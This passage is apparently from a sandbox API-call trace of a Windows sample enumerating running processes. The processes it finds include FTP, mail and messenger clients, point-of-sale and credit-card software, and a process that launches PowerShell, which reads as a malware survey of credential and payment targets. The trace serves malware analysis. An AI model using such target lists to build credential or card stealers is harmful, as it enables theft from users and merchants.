pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0215.073] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0215.076] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0215.077] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0215.079] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0215.083] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0215.085] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0215.087] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0215.088] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0215.090] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0215.091] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0215.093] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0215.094] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0215.096] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0215.140] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0215.142] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0215.143] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0215.144] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0215.146] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0215.147] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0215.149] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0215.151] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0215.153] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0215.155] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0215.157] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0215.159] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0215.161] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0215.163] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0215.165] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0215.167] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0215.169] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0215.171] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0215.173] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0215.267] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0215.269] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0215.271] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0215.273] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0215.287] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0215.289] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0215.291] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0215.293] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0215.295] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0215.296] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0215.298] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0215.300] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0215.302] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0215.303] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0215.305] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0215.307] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0215.309] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0215.351] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0215.352] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0215.354] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0215.356] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0215.357] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0215.359] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0215.361] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0215.363] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0215.364] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0215.366] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0215.368] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0215.369] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0215.371] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0215.373] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0215.375] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.377] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.379] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0215.381] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.382] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.428] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0215.430] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0215.432] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0215.434] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.437] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0215.439] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0215.441] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0215.442] CloseHandle (hObject=0x1eb8) returned 1 [0215.442] Sleep (dwMilliseconds=0x64) [0215.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0215.496] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.498] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.499] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.501] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.541] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.542] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.544] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: 